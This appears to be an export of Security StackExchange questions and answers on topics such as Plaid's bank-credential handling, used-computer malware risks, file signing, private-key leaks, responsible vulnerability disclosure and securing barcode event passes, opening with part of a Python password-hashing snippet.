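    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"

def verify_password(password: str, stored: str) -> bool:
    _, iterations, salt_hex, digest_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate.hex(), digest_hex)

record = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", record))  # True
```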
198,005 | I recently signed up for Privacy.com, which uses a service called Plaid to link a bank account. To do this, it requires the user to provide their banking username and password to a webpage from Plaid, not their bank. Then, Plaid accesses the user’s bank account with those credentials on the user’s behalf to get information. Plaid provides an API for websites and apps to easily access this banking information. In addition to Privacy.com, plenty of other popular services use Plaid, including Venmo, Robinhood, and Coinbase. Despite the popularity, this service appears to break two "fundamental" Internet security rules: Never give credentials to a third party. The standard is to redirect the user to a login page on the website of the service providing the login. Plaid doesn’t do this, instead providing the login form on their own website. Even worse, Plaid allows services to embed the form in their websites (as an iframe). It’s not possible for casual internet users to tell the difference between this and an “unsecured” form on some random website, so this appears to be encouraging bad security practice. Worse still, Plaid provides a login page that looks very official, showing the bank logo and using the bank’s color scheme. Never store passwords in plaintext. The only way for Plaid to access bank account details is with the password, and since my banking password was only required by Plaid once, they must be storing it in plaintext, or "encrypted" but convertible to plain text, so they can continue to use it to access my account. The problem seems to be that most banks do not provide an API to retrieve customer data, so a service like Plaid (and all the services that use Plaid) simply wouldn't be possible without breaking these "fundamental" security rules. But I'm not convinced that's justification for breaking them. If it's not possible to do it securely, should it be done at all? My confusion here is that all of these services are "legitimate". None of them are scams; they're all providing a valuable service and have a solid reputation. Plaid has raised billions in funding! I would think with Plaid using bank logos to make their “fake” bank login forms look legitimate, banks would be after Plaid with lawsuits. But apparently some of them are investors! On Plaid’s website Citi, American Express, and others are listed as investors. It appears that banks aren’t against this bad practice, and are, in some cases, actually encouraging it. This makes me think that I might be missing something. Maybe Plaid has some special access to banking systems and it isn’t as bad as it seems. On the other hand, maybe Plaid’s reputation is held up only by the fact that they haven't been hacked yet. If (when) they are hacked it will be devastating, since the worst case scenario means the leaking of millions of user's active bank usernames and passwords. Also, many banks don’t protect users if they knowingly gave their credentials to a third party, so a lot of people could lose a lot of money. But if that's the case, wouldn't banks be working to stop Plaid and protect their customers? I think many of the services provided by Plaid are neat and would like to use them, but if my suspicious here are correct I don’t think I can do so while remaining secure. Of course, I hope I’m completely wrong here and Plaid has some way to operate securely. 
So, does Plaid have some special access to banking systems, or is it using user passwords to log in to bank accounts, which requires storing them in plaintext (or convertible to plaintext) and convincing users to give their credentials to a third-party, encouraging bad security practice? If it’s the latter, I’m afraid I’ll have to pass on Plaid services for now and consider my banking password compromised. | I want to point out that despite Plaids apparently honest attempts at security, their approach is a privacy nightmare, as you give full access to Plaid, to all and every single information your bank has on you, including loans, funds, investment accounts, credit card statements, address, etc. This makes Plaid differ substantially from other payment services, such as PayPal, as they only have your account number. If you don't believe me, here's their data collection description from their privacy statement (Effective Date: February 22, 2021, my italics): Information we collect from your financial accounts. The information we receive from the financial product and service providers that maintain your financial accounts varies depending on a number of factors, including the specific Plaid services developers use, as well as the information made available by those providers. But, in general, we collect the following types of identifiers, commercial information, and other personal information from your financial product and service providers: Account information, including financial institution name, account name, account type, account ownership, branch number, IBAN, BIC, account number, routing number, and sort code; Information about an account balance , including current and available balance; Information about credit accounts , including due dates, balances owed, payment amounts and dates, transaction history , credit limit, repayment status, and interest rate; Information about loan accounts , including due dates, repayment status, balances, payment amounts and dates, interest rate, guarantor, loan type, payment plan, and terms; Information about investment accounts , including transaction information , type of asset, identifying details about the asset, quantity, price, fees, and cost basis; Identifiers [ NB : SSN?] and information about the account owner(s), including name, email address, phone number, date of birth, and address information ; Information about account transactions, including amount, date, payee, type, quantity, price, location, involved securities, and a description of the transaction ; and Professional information, including information about your employer, in limited cases where you’ve connected your payroll accounts or provided us with your pay stub information. The data collected from your financial accounts includes information from all accounts (e.g., checking, savings, and credit card) accessible through a single set of account credentials . Also note how the scope of the information collected has expanded over time, by looking at the previous revisions of this answer. To make matters even worse, they can share all that information with their customers, i.e., the company that wants you to link with them. That means that when, e.g., your rent is paid via Plaid (my landlord uses a service that relies on Plaid), all of that information may be shared with that service! And while they, in turn, may not distribute that data further, you now have to trust another party that they are able to keep your data safe. 
Again, here's the relevant excerpt from that privacy statement (again, my italics): How We Share Your Information We share your End User Information for a number of business purposes: With the developer of the application you are using and as directed by that developer (such as with another third party if directed by you); To enforce any contract with you; With our data processors and other service providers, partners, or contractors in connection with the services they perform for us or developers; [...] In connection with a change in ownership or control of all or a part of our business (such as a merger, acquisition, reorganization , or bankruptcy); Between and among Plaid and our current and future parents, affiliates , subsidiaries and other companies under common control or ownership; As we believe reasonably appropriate to protect the rights, privacy, safety, or property of you, developers, our partners, Plaid, and others; or For any other notified purpose with your consent. | {
"source": [
"https://security.stackexchange.com/questions/198005",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/191697/"
]
} |
198,006 | Is it possible to trigger a reader from a standard RFID Access Control System? More specifically the badge system commonly used in companies for allowing entry. As in passing an ID to it? Assuming you have a valid ID you can send to it. I'm aware there are multiple technologies involved in these type of systems but I'm referring to the more common case (having to place a non-active tag near a reader). | | {
"source": [
"https://security.stackexchange.com/questions/198006",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/191699/"
]
} |
198,067 | There's this person online with whom I have only interacted a few times. They had asked me for a small favour, which I did. They then wanted to give me something in return as a thank you. They were going to post it, so they wanted my address. I am countries away and I'm not used to mail, especially international mail. I hate that I'm paranoid like this when I genuinely look forward to their gift, but I need to know to what extent do I share my details? | In the end, it all comes down to trust and risk. How much do you trust this person and how much do you want to give as far as details goes, what can someone do to harm you when they have your data? That you're asking here tells me you're not really sure if you can trust this person. There are risks involved (such as real life threats or maybe a possible scam) but it is not easy to identify risks without knowing the full situation, as you explained it rather vaguely. To me the whole situation sounds kinda phishy to be honest. Are you sure you didn't fall for a phishing or scam attempt by helping this other person? Most countries do have PO boxes and other rent-able post solutions such as Poste Restante (as suggested by Molot in the comments) so you don't have to give out your own personal details. | {
"source": [
"https://security.stackexchange.com/questions/198067",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/191779/"
]
} |
198,119 | Somehow related to this other question . I am dealing with the following case: a medium-large company (with about 200 on-premises employees) is applying the following procedure for all the newly recruited employees (immediately before their first day at the company): they generate a password for the user (NOT a change-at-first-login
one) they login on their laptop (impersonating the final user) they apply some configuration (e.g. they access their Outlook email in order to check that everything works) they change again the password (this time with a change-at-first-login one) the laptop is delivered to the user It appears that this procedure is quite common also in IT companies. I cannot say if the initial configuration, "in the name of user", is absolutely necessary or just dictated by convenience reasons (a fully working laptop is delivered to a non-IT user, preventing a lot of requests to the IT for fixing common issues), but there a few things that smell: if I should never tell an admin my password (as it has been answered
to the cited question) there is no reason that an admin knows my
password even at the very beginning of my work in that company I can accept that an admin knows my password (when he first creates my account or when he resets it) provided that it's a
change-at-first-login password (so that I have evidence that it's not
been used before). I suspect anyway that most legacy systems (like
AD) allow admins to reset passwords with great freedom (for example
resetting passwords without notifying the user, or without forcing
them to set a change-at-first-login one). Is it an accepted practice?
This seems completely different from what happens for example in
Google (no one knows my password, if an activity is detected I am
notified). Edit: to answer many comments that state that "the computer is not yours, it's the employer's computer, you should not have personal information on the company computer" I would like to point out that it's not a matter of personal information, but reserved information regarding the company business. So, if it's correct that I should not use my company email to receive my blood analysis results from my doctor, it's perfectly common that some reserved information about the company is exchanged between employee A and employee B. | If I should never tell an admin my password (as it has been answered
to the cited question) there is no reason that an admin knows my
password even at the very beginning of my work in that company One of the main reasons to this rule is that Admins should not access your confidential data such as mails, etc... Since there is no data associated with the account at the very beginning this is not an issue. they generate a password for the user (NOT a change-at-first-login one) Using a single sign-on password will ask for a normal password before one can change the configuration. So a password is needed before accessing the config. I suspect anyway that most legacy systems allow admins to reset
passwords with great freedom. Is it an accepted practice? This is an accepted practice. Not only old systems: newer systems like Office 365 also allow the admins to reset a user's password without notifying the user. However, any such reset gets logged in the system and the admin will be held responsible for any issues. Also note that not all configurations can be changed at the admin level. Some things can only be performed by the user. Instead of telling each and every user to perform a set of steps, they are doing it ahead of time. Some other concerns of sharing a password do not apply here: reusing the password is irrelevant, as the password is not yours, and none of your personal information is associated with the password. To answer some comments, I suspect that "there is no data associated with the account at the
very beginning" it's not absolutely true: I could have some emails in
my mailbox (someone could have sent my some confidential info to my
email address, because the mailbox has been activated before I first
log in) by Diego Pascotto Mail Id should not be shared to anyone by the Admins before configuration. The mailbox must have been activated when setting up outlook. Email Ids are shared only after single sign-in password is set. Also as pointed out by James Snell , receiving an email within minutes of account creation is unlikely. A competent company has images, procedures, via automation that take
care of these things without ever logging in as the new user at any
time. by Sokel Small companies do not always invest in automating. If a company hires around 10 staff per year and each with a different role the effort required to bring automation and maintain it will be greater than the manual effort. Automation is only worth the effort when you are having job that is done repeatedly in large numbers. In other words, the effort required for automation should be less than what your effort required for manual work If the admin has had unmonitored access to your account at any point
in time; they could've set up anything under your name - preventing
any returns to them. by UKMonkey Any actions taken by the admins during this time can be linked back to them as it is clear that the account is not handed over to the user until the user resets the password using the single sign-on password. | {
"source": [
"https://security.stackexchange.com/questions/198119",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/191838/"
]
} |
198,134 | In security news, I came across a new term related to hash functions: it is reported that the "in-house hash function" used in the IOTA platform is broken (i.e. the Curl-P hash function). You can find the complete paper introducing the vulnerability here . But I do not understand whether the term "in-house" refers to a specific type of hash function. And in general, what does "in-house" mean here? | From the explanation of in-house in the Cambridge Dictionary : "Something that is done in-house is done within an organization or business by its employees rather than by other people" . Here it means developing your own hash algorithm instead of using a public one. Usually that means it is developed by only a few people with only limited expertise in the problem area and without any public input. Thus it is very likely that the self-developed algorithm eventually gets broken once more experts in cryptography take a look at it. See also Why shouldn't we roll our own? and How valuable is secrecy of an algorithm? . | {
"source": [
"https://security.stackexchange.com/questions/198134",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/187204/"
]
} |
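To make the "don't roll your own" point concrete, here is a small Python sketch (standard library only) contrasting a deliberately naive "in-house" hash with a vetted one; the messages are made up for illustration. The toy sum-of-bytes hash collides the moment two inputs contain the same bytes in a different order, while SHA-256 does not.

# A deliberately naive "in-house" hash: just sum the bytes.
def toy_hash(data: bytes) -> int:
    return sum(data) % 2**32

# Same bytes, different order -> instant collision for the toy hash.
print(toy_hash(b"transfer 100 to alice"), toy_hash(b"transfer 001 to alice"))

import hashlib
# A publicly vetted hash distinguishes the two messages.
print(hashlib.sha256(b"transfer 100 to alice").hexdigest())
print(hashlib.sha256(b"transfer 001 to alice").hexdigest())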
198,263 | I often establish Ubuntu LAMP environments on which I host a few Drupal web applications that I myself own (I don't provide any hosting services and have never done so in the past). Whenever I establish such an environment, the most fundamental security steps I take are these: ufw --force enable
ufw allow 22,25,80,443 # All allowed via both TCP/UDP as no restrictions were given;
apt update -y
apt upgrade -y
apt install unattended-upgrades sshguard After the 2017-2018 W3C / Google (?) reforms regarding browser support in HTTP, requiring or at least encouraging all of us to use TLS encryption confirmed with an SSL certificate for secured HTTP data transfer (HTTPS), I wonder if unsecured HTTP (typically via port 80) is still relevant at all to any of us. Notes: Each of my web apps has its own OpenSSL certificate I create with Certbot . The only web utility I use besides websites is either PHPMyAdmin/PHPMiniAdmin. My question Is it okay for me to remove port 80 from ufw allow 22,25,80,443 thus making my system even a tiny bit less "vulnerable"? Update per answers Answers recommend redirecting from port 80 to port 443 instead of just blocking port 80. I think Certbot creates these redirects automatically so I'm covered if I keep port 80 open as recommended in the answers. | Google, the major search engine of the Internet (dwarfing both Bing and Yahoo), and the browser used by the majority of Internet users, has been pushing for an HTTPS-only world by decreasing the page rank for sites that do not use HTTPS, and adding a browser warning when a site is not secure. However, the ratio of HTTPS sites to non-HTTPS sites is still far too low to recommend an HTTPS-first policy for everyone, because users would pretty constantly get scary "certificate error" messages or "connection refused" errors. So, until Google recommends an HTTPS-first policy for browser connections, it's not likely that Firefox, Apple, or Microsoft will recommend such policies, either, and that is not likely until a decent majority (perhaps 70% or more) of top sites are HTTPS enabled, which would be a huge increase from the ~50% of top sites that have HTTPS today . Most users that intentionally or accidentally visit your HTTP site, if greeted with a "connection refused" error, will likely move on to another site. I don't have a good way to get concrete numbers here, but it would be likely that 70-90% of Internet users probably wouldn't figure out the site has no HTTP port without an automatic redirect; the remainder are probably either technically competent enough to realize they need HTTPS, or use HTTPS Everywhere, and wouldn't notice anyways. Definitely use HSTS, definitely 301 redirect to HTTPS resources (the 301 indicates a permanent move to browsers, so they will "remember" this preference), definitely advise your users to make sure they see a padlock and verify the certificate, etc. Do not block port 80 at this point, as the Internet simply is not ready for this yet. As far as I know, there are no major sites that have disabled HTTP and blocked port 80. If you do this, you'll be breaking user expectation (that the site will forward you to a secure site), and since most users won't know what to do here (they won't get a friendly error message), they will simply assume your site is broken and move on. | {
"source": [
"https://security.stackexchange.com/questions/198263",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
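To make the "keep port 80 open, but 301-redirect everything to HTTPS" advice concrete, here is a minimal Python sketch using only the standard library; in practice the redirect is normally configured in Apache/nginx or by Certbot, and the host name here is a placeholder. Note that the HSTS header itself has to be sent by the HTTPS site, not by this port-80 redirector.

from http.server import BaseHTTPRequestHandler, HTTPServer

class RedirectToHTTPS(BaseHTTPRequestHandler):
    def do_GET(self):
        # 301 tells browsers the move is permanent, so they remember the HTTPS URL.
        self.send_response(301)
        self.send_header("Location", "https://example.org" + self.path)  # placeholder host
        self.end_headers()

    do_HEAD = do_GET

# Needs permission to bind port 80.
HTTPServer(("", 80), RedirectToHTTPS).serve_forever()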
198,392 | I suppose the FBI receives email with attachments, like any other government agency: documents, resumes/CVs, etc. I also suppose they are very careful not to get infected, more than the average user, for obvious reasons. If I were to send an email to the FBI, attaching maybe a PDF with my resume/CV, how are they going to open it? So I wonder if US government agencies are known to use particular procedures or follow particular standards for dealing with emails safely. I also suppose what I'm asking is not secret information, given the large number of people involved (all the people who work in or for the government are expected to deal with emails safely). | While I cannot speak for every government agency everywhere, in highly secure environments, what I have seen [unable to disclose] is: (1) sandboxed email attachments, or (2) no attachments at all, but authorised, attributable file upload tools instead. In each instance, the attachment is inspected and run in an isolated sandbox. The recipient only interacts with the file through this abstraction. Oftentimes, the content is extracted as text and reconstructed in a structured way, wherever that is possible. | {
"source": [
"https://security.stackexchange.com/questions/198392",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/175681/"
]
} |
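A rough sketch of the "extract the content as text" idea, using Python's standard email library: only plain-text parts are kept and every attachment is ignored rather than opened. Real mail gateways do far more than this; the function below is only an illustration of the principle.

from email import policy
from email.parser import BytesParser

def extract_text_only(raw_message: bytes) -> str:
    # Parse the raw RFC 822 message and keep nothing but text/plain bodies.
    msg = BytesParser(policy=policy.default).parsebytes(raw_message)
    parts = []
    for part in msg.walk():
        if part.get_content_type() == "text/plain" and not part.is_attachment():
            parts.append(part.get_content())
    return "\n".join(parts)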
198,398 | I bought a used computer that appears to be wiped clean, but can I be sure? | It all boils down to which kinds of threats you want to mitigate against - a determined attacker has many more options for leaving malware on your computer than just your hard drive, but it's getting increasingly complex to do so. If you're a rocket scientist working on the newest version of ICBMs you have more to fear than a college student who uses their computer for a few class assignments and some of the newest games (but in the rocket scientist's case, you won't be allowed to use self-bought used computers anyway). Also, it depends a bit on how competent a presumed non-malicious previous owner was in protecting against malware. And of course, "wipe clean" can mean anything from "deleting personal files, then emptying the wastebasket" to "reinstall the OS" to "completely overwrite the disks with random data/zeroes, then do an install from scratch". The typical threats you should mitigate against are random malware infections that the previous owner caught somehow. Wiping the disks clean, then reinstalling the OS should be enough to get rid of those. Some computers, mainly laptops, come with a "recovery partition" that allows you to quickly reset the computer to factory condition; I wouldn't use that. First, because a virus might have altered the install files as well to survive a reinstallation; second, these recovery partitions often come with a lot of crapware which the manufacturer installs because they're paid a few dollars by the crapware maker. Better download an installation DVD/USB medium from Microsoft/Ubuntu/whichever OS you're using, and do a fresh install from that. Besides that, there are many more locations that could have malware, but it's unlikely to find them on your used computer unless you are specifically targeted. The computer BIOS might be altered to do stuff even before booting, for example, it could have a keylogger trying to steal your passwords, or even keep a few cores of your CPU busy mining bitcoin for the previous owner. It can't hurt to check the manufacturer's website for the newest BIOS update, and flash the newest version of it, even if that's the version you already (seem to) have. This is already quite paranoid, but still something you can do in a few minutes so doing it won't hurt you much. The hard drive firmware itself could be altered. Someone published a proof-of-concept a few years ago in which he installed Linux on the hard drive - no, the computer didn't run Linux; the hard drive itself ran Linux, ignoring the fact that it was supposed to be a hard drive (see http://spritesmods.com/?art=hddhack - on page 6, he adds a backdoor by replacing the root password hash with a known one every time the disk reads /etc/shadow, and on page 7, he boots a Linux kernel on the disk itself). The CPU microcode itself could be altered to do stuff, including ignoring any further microcode updates. Unlikely that this could be done without cooperation from Intel, but still a possibility if the NSA is trying to target you. (However, if the NSA were targeting you, "hope he'll buy the spiked used computer we put on ebay for him" wouldn't be their primary strategy, I assume). So, if you're just a random guy, wiping the hard disks and doing an OS reinstall from scratch provides good protection against the kinds of threats you can reasonably expect.
However, if you have any reason to assume someone is actively targeting you - this includes MDs keeping patient data on their computers, credit card processors, ... - "Just don't buy used computers" is the first thing in a long chain of measures you need to take. | {
"source": [
"https://security.stackexchange.com/questions/198398",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/183656/"
]
} |
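Related to the advice to reinstall from a freshly downloaded image: a small Python sketch that checks a downloaded installer against the SHA-256 checksum published by the vendor. Both the file name and the expected digest below are placeholders you would replace with real values.

import hashlib

EXPECTED_SHA256 = "replace-with-the-vendor-published-digest"  # placeholder

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        # Read in chunks so large ISO images do not need to fit in memory.
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

digest = sha256_of("installer.iso")  # placeholder file name
print("OK" if digest == EXPECTED_SHA256 else "MISMATCH - do not use this image")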
198,423 | I'm a bit new to security and trying to get the concepts properly. I'm wondering what exactly "signing" a file (a certificate, an apk file, or something else) means? Do we sign the whole file so it becomes sort of encrypted? Is there like a piece of plain text that we sign and pass it through, for example, a zip, and let the receiving side check that piece based on a particular protocol before going any further? Or something else? As far as I can see, if we sign the whole file, then it can be more secure as the contents would be encrypted (or signed). But I've also seen/heard some examples where you only sign a piece of text instead of the whole thing. Any ideas would be greatly appreciated. PS: I've already checked What does key signing mean? | Signing a file does not encrypt it. When Alice signs a file she usually signs the whole file. So she calculates a hash of the whole file and signs only the hash with her private key and attaches this piece of information to the file. Bob uses her public key to verify it and gets her calculated hash. He then calculates the hash of the file himself (without the signature of course) and checks both hashes. If they match, it's the same exact version of the file Alice sent. If they don't match, Mallory could have changed it. The file itself never gets encrypted, and of course you can just remove the signature, but then it's not signed anymore (and therefore worthless). For more technical and detailed information please refer to forest's answer: https://security.stackexchange.com/a/198473/191453 | {
"source": [
"https://security.stackexchange.com/questions/198423",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/183109/"
]
} |
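A minimal sketch of the hash-then-sign flow described in the answer above, using the third-party "cryptography" package with an Ed25519 key pair: Alice signs the file's SHA-256 digest, Bob recomputes the digest and verifies the signature, and the file itself is never encrypted. The file name is a placeholder.

import hashlib
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from cryptography.exceptions import InvalidSignature

def digest(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).digest()

private_key = Ed25519PrivateKey.generate()   # Alice's key pair
public_key = private_key.public_key()

signature = private_key.sign(digest("document.pdf"))   # placeholder file name

try:
    # Bob recomputes the digest himself and checks it against the signature.
    public_key.verify(signature, digest("document.pdf"))
    print("Signature valid - same file Alice signed")
except InvalidSignature:
    print("Signature invalid - file was modified or the signature was replaced")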
198,468 | Are there any known cases of HTTPS websites leaking the private key of their SSL certificate? Is it even technically possible for a bad website admin to misconfigure a site to send the private key as part of the certificate chain? | Are there any known cases of HTTPS websites leaking the private key of their SSL certificate? Yes - the Heartbleed bug involved memory leaks out of the HTTP server such that: We attacked ourselves from outside, without leaving a trace. Without
using any privileged information or credentials we were able steal
from ourselves the secret keys used for our X.509 certificates, ... Aside from bugs like that, Is it even technically possible for a bad website admin to
misconfigure a site to send the private key as part of the certificate
chain? Sure. If you specify the wrong file in, for example, SSLCertificateChainFile then Boom! There goes the private key. As @duskwuff points out in the comments, there are protections against this. Neither Apache nor NGINX will send a key PEM that's included in a certificate file; they will silently strip it out (which, I'm willing to bet, is a protection put in place after some number of events where people did what I suggested might work). Other misconfigurations, such as incorrect web root combined with loose permissions or excessive web server privileges, will also leak the key, but those misconfigurations are both mundane and extreme (e.g., you really have to be trying to break things that badly). Doing so is not recommended. | {
"source": [
"https://security.stackexchange.com/questions/198468",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/56659/"
]
} |
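A quick sanity check in the spirit of the misconfiguration described above: before deploying a certificate-chain file, scan it for an accidentally embedded private-key block. This is a small Python sketch; the file path is a placeholder.

import re

def contains_private_key(pem_path):
    with open(pem_path, "r", encoding="utf-8", errors="replace") as f:
        pem = f.read()
    # Matches "-----BEGIN PRIVATE KEY-----", "-----BEGIN RSA PRIVATE KEY-----", etc.
    return re.search(r"-----BEGIN [A-Z ]*PRIVATE KEY-----", pem) is not None

if contains_private_key("chain.pem"):  # placeholder path
    print("WARNING: private key material found in the chain file - do not deploy it")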
198,541 | A company I used to work for developed a Point Of Sale system that also has an eCommerce portion. While working there, I discovered massive flaws with their security model. Simply put, there is 0 server side validation.
Any user, logged in or not, can do things like edit prices, fake transactions, mess with time sheets, etc all from the comfort of their home. I reported this several times verbally, but it was mostly ignored as not a priority. They have since expanded their clientele, and now serve quite a few clients.
I have verified that the exploits still work just as they did several years ago. I have no interest in saving face for this company, they treated me and many others very poorly and abusively, forcing overtime without pay and similar transgressions. What is the best way to report this security issue? Do I send an email to their clients? Or should I publicly disclose the attack and let the internet handle it? edit: I would like to add that the exploits are not complicated or obscure, anyone who opens devtools in their browser would be able to figure out that they can just edit the data on the fly edit 2: After reading all of these responses, I will be sending the company an anonymous email with a POC. I will also be giving them a 60 day period to address the issue before I report it to their customers | A quick word of caution You sound very invested in trying to do something. If I can be frank, it sounds like you are at least partially motivated by your frustrations with the way the company treated you as an employee. This can be understandable, but doesn't necessarily lead to good decisions. In particular one option you mention (contacting customers and informing them of the issues) is the sort of thing that, rightly or not, and regardless of how it might end, can result in lawsuits filed against you by your former employer. So tread lightly. All things considered that is probably a very bad idea. Understanding the (flawed) business perspective Unfortunately the situation you describe is not uncommon in the software industry. From the perspective of many companies, bring up security issues is asking them to spend real money (in terms of developer salaries) to fix a problem that they cannot see for a benefit that may not be needed for a long time (it may in fact be a while before someone tries to hack them). It's a hidden benefit with an upfront cost, and that is something that short-sighted thinking can easily ignore for a long time. After all, from their perspective, the things you are making a big deal about have never actually caused problems but will definitely take a lot of time and effort to fix, so why should they fix it? (I'm not saying they are right, I'm just explaining the thought process). It's important to understand that this is obviously the approach that your ex-employer is taking. You have informed them of the issue and they have decided to ignore it. There is no reason to think that any (legal) action you can take as an outsider is going to change that, especially since you failed to make any changes as an insider. Of course we know that with bad security practices, someone finding and exploiting a weakness is inevitable, especially if they start to see any real kinds of success (i.e. having a large customer base). As long as none of their customers take the time to delve into potential security concerns proactively (and most don't, because they don't know enough to look properly even if they do care), situations like this can go on for a surprisingly long time before it causes real problems. In the worst-case scenario this leads to situations like the equifax security breach . For smaller companies this can result in complete bankruptcy . Reality So what do you do about it? If management knows about the problem but refuses to change, there probably isn't anything you can do to force them to change. You can try things you mentioned like reporting this to their customers, but their customers may not take you seriously. 
For all they know you are simply a disgruntled ex-employee trying to cause trouble for your previous employer. If they didn't know enough to look into these things before starting to use the platform, then there is no reason to think they know enough to take your claims seriously now. More likely than not you'll just end up being ignored or sued. (per @forest's answer) You certainly should submit a CVE. You could also try submitting bugs through a third-party bug bounty program. There are some that have popped up in recent years and exist to try to act as a neutral arbiter between "independent security researchers" (aka you) and sites that otherwise don't have bug reporting programs (aka your former employer). Of course such programs work only if the company you are reporting bugs to actually listen. You already know that your former employer won't. However, having published and ignored vulnerabilities through standard channels will help their customers in the long run when they do get hacked. This will change the situation from simple incompetence to outright negligence, which comes with much stiffer financial penalties in civil court (FYI: IANAL). Any further (legal) options will vary depending on your jurisdiction, aka in Europe you may find some venues for legal action through the GDPR. In many places though you probably don't have any options that can immediately bring legal trouble to them. Most likely that won't happen until they get hacked and their customers sue. Having a published CVE will help their customers when that happens. In the meantime, it sounds like you are thinking about posting something publicly "on the internet". What would be your goal there? Realistically, your attempts to do that will probably just be ignored by the internet. It's possible however that they may end up hacked much sooner as a result though. Without going through more standard channels though, you probably dramatically increase your own risk of legal repercussions. Therefore, I would personally keep to official channels. Again, I may be misreading you, but I think your question is largely coming from the place of someone who is angry at a past-employer and is, to some extent, looking to cause trouble. That's a good way to get yourself in legal trouble or at least give yourself a bad name when trying to find jobs in the future. I think you should try to stop looking at this from the perspective of an ex-employee and focus more on the perspective of a neutral-security-researcher. | {
"source": [
"https://security.stackexchange.com/questions/198541",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/192298/"
]
} |
198,589 | We have a client who hosts an event, with a tight budget, that uses lanyarded Photo-ID cards with barcodes on them. The barcodes are used to gain access to various areas at the event. We were thinking of proposing a hashed code (currently the IDs are sequential), but then it occurred to us that it's pretty easy to 'swipe' a card
with high resolution photography, and then overlay one's existing barcode with a printout of the swipe. Bearing in mind that we are using ean13 scanners, and there really is a tight budget (so NFC is out for the time being) - would an overlay, such as red cellophane, serve any purpose in mitigating this specific kind of attack? What actually happened This being the most popular post I have ever written on SE, I thought I may provide you with some follow-up. First of all, thank you all so much for your thoughts. It helped by providing us with a list of things not to do just as much as what to do, which was of great value. What we did Security was given access to cheap laptops with their EAN 13 scanners using a USB port. The laptops were signed in (under unique IDs) to our security app. The IDs used were generated using a well-designed RNG (not by me, so details are missing here - but it met a bunch of tests) which bore no relation to identities. There were just over 2,500 attendees over several days. We did not use anything to obscure the EAN 13: It was easy enough to duplicate them. However, that wasn't enough to gain entrance. On presentation and scan, the software (linked to our own monitoring service) checked the existence of the ID (fail #1), as to whether or not the ID had already been used (fail #2), and then returned the identity details (photo, name, etc) of the individual for whom that identity was attached. This last depended upon human check, (fail #3). We also had people attending who did not have a lanyard ("I lost it" / "I don't need one" / etc...) and they were deferred to a separate security building where they were issued their missing lanyard, after having provided an ID document (passport/license,etc.). As everyone needed an ID card - even VVIPs, there were no exceptions. Social hacking attempts were made - but they failed. Several VVIPs wanted their partners (unregistered) to attend and that was escalated to senior management where the decision was made) - about 50% of them were given new registrations and corresponding printed lanyards/IDs. About 50% were turned down. Duplicates did happen - which surprised us. Where it did occur, it was easy enough to identify whether or not they were the person that the card had been issued to. We also had cards from previous events. They looked different, and also their IDs were different. Some attendees had actually just brought the wrong lanyard - they were given a replacement at security. Others were turned away. I have to say that the security staff were incredibly professional - and they were treated very well by the event hosts, with meals laid on, and a free drinks bar for security at the end of the event. Access to the event was highly controlled. All entrances and exits, even if locked, where monitored. What we didn't do The security personnel were 100% trusted. There could have been an 'inside man/team' among them, but it would have been quite hard to orchestrate and we doubt that there would be sufficient motive. The security company had already performed vetting - and really wanted to win this work again for following years (as it had for previous years), so maybe there was much less risk there than I imagine. What I learned Defense in depth and real-life MFA were the two things I learned. Expecting a single part of the security system to be enough for the entire security system would have been an unnecessary mistake. Low tech is good, as long as it's used correctly, and without any ridiculous over-expectations. 
OMG look after the security staff well. Since they are our eyes and ears, we have every reason to keep them happy and loyal. TL;DR There is nothing wrong at all with unprotected barcodes as long as you don't expect them to do much. They were used for both security and comms, and (if we ever get back to non-lockdown events) we will probably introduce restriction zones also (which, apparently, was poorly done using an alternative system - not designed by our team). Everyone was safe, nobody was hassled, and it was a very successful event. | Simple answer: No If you can see it, you can photograph it. There have been countless attempts over the years to solve this part of DRM and all have failed. Instead of focusing on the barcode, have you considered making it difficult to copy the id card itself? So that security for each area can quickly check it isn't an overlay? For example a hologram over the barcode that the scanner ignores but a human can check, or a high quality plastic card with the barcode in the coloured coating - a guard can spot a fake overlay. | {
"source": [
"https://security.stackexchange.com/questions/198589",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/192343/"
]
} |
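A rough Python sketch of the check-in logic described in the follow-up (random, identity-free IDs plus the three failure checks). The names and data structures are invented for illustration; the real system described above used a separate RNG, a monitoring service, and a human photo check.

import secrets

attendees = {}          # badge_id -> {"name": ..., "photo": ...}, filled at registration
already_scanned = set()

def register(name, photo_path):
    # 12 random digits with no relation to the person; a real EAN-13 would append a check digit.
    badge_id = str(secrets.randbelow(10**12)).zfill(12)
    attendees[badge_id] = {"name": name, "photo": photo_path}
    return badge_id

def check_in(badge_id):
    record = attendees.get(badge_id)
    if record is None:
        return "fail #1: unknown ID"
    if badge_id in already_scanned:
        return "fail #2: ID already used"
    already_scanned.add(badge_id)
    # fail #3 is the human step: the guard compares the returned photo/name to the person.
    return record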
198,597 | While cleaning I've found an old cellphone. This phone does not turn on, and I'm not sure if it contains personal data. I would like to throw away this phone, but I'm concerned that this data could be recovered some way. What could be the best way to securely destroy it? Not sure if relevant, it's an iPhone 3G. | Since the phone no longer powers on, you cannot rely on a software wipe or a factory reset, so the dependable option is physical destruction of the storage. Open the phone and destroy the internal flash memory chip itself - drill through it, crush it, or have the board shredded - rather than just the casing or screen. For most realistic threat models, a physically destroyed flash chip makes data recovery impractical. If you would rather not do this yourself, many electronics recyclers offer certified destruction of storage media. | {
"source": [
"https://security.stackexchange.com/questions/198597",
"https://security.stackexchange.com",
